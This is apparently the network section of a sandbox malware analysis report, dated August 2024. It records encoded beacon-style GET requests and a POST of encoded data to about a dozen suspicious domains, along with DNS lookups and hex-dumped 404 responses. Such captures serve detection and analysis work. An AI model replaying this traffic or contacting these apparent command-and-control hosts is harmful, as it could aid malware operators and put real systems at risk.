            Source: global trafficHTTP traffic detected: GET /1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.8xbe578.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.synergon.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.alanbeanart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.kacotae.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.slushcafe.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.tqfabxah.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /l2ei/?dZo=2NxpSnefRSOpgA+Cw+nYyIA+NZzll6fiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINn5BMEGgIAwhvnt05vUIz6811FQIGXw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.rtrpodcast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.mqmsqkw.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.lfghtko.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficDNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.stemfiniti.com
            Source: global trafficDNS traffic detected: DNS query: www.zhuan-tou.com
            Source: global trafficDNS traffic detected: DNS query: www.lecoinsa.net
            Source: global trafficDNS traffic detected: DNS query: www.8xbe578.app
            Source: global trafficDNS traffic detected: DNS query: www.synergon.space
            Source: global trafficDNS traffic detected: DNS query: www.alanbeanart.com
            Source: global trafficDNS traffic detected: DNS query: www.kacotae.com
            Source: global trafficDNS traffic detected: DNS query: www.slushcafe.top
            Source: global trafficDNS traffic detected: DNS query: www.a9jcpf.top
            Source: global trafficDNS traffic detected: DNS query: www.tqfabxah.com
            Source: global trafficDNS traffic detected: DNS query: www.rtrpodcast.online
            Source: global trafficDNS traffic detected: DNS query: www.winkthree.com
            Source: global trafficDNS traffic detected: DNS query: www.mqmsqkw.lol
            Source: global trafficDNS traffic detected: DNS query: www.lfghtko.lol
            Source: unknownHTTP traffic detected: POST /pjmu/ HTTP/1.1Host: www.zhuan-tou.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.zhuan-tou.comReferer: http://www.zhuan-tou.com/pjmu/Content-Length: 192Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31Data Ascii: dZo=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzrbMmrToTQ0JNkpZkTRBhlDDYq6uZj
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:24:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:25:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:25:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:25:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Sun, 18 Aug 2024 16:25:38 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Sun, 18 Aug 2024 16:25:41 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Sun, 18 Aug 2024 16:25:44 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 2247date: Sun, 18 Aug 2024 16:25:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 64 68 6f 73 74 69 6e 67 2e 70 6c 20 2d 20 70 6f 64 20 74 79 6d 20 61 64 72 65 73 65 6d 20 6e 69 65 20 7a 6e 61 6a 64 75 6a 65 20 73 69 c4 99 20 c5 bc 61 64 65 6e 20 73 65 72 77 69 73 20 57 57 57 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 7b 0d 0a 66 6f 6e 74 3a 20 31 
32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 33 33 33 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 69 6d 67 7b 0d 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 3a 68 6f 76 65 72 2c 20 61 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 23 74 72 65 73 63 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 7d 0d 0a 23 66 6f 6f 74 7b 0d 0a 66 6f 6e 74 3a 20 31 30 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 62 6f 74 74 6f 6d 3a 35 70 78 3b 0d 0a 77 69 64 74 68 3a 39 39 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 3a 6c 69 6e 6b 2c 20 2e 66 3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 18 Aug 2024 16:26:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 18 Aug 2024 16:26:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 18 Aug 2024 16:26:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 18 Aug 2024 16:26:16 GMTContent-Type: text/htmlContent-Length: 552Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; 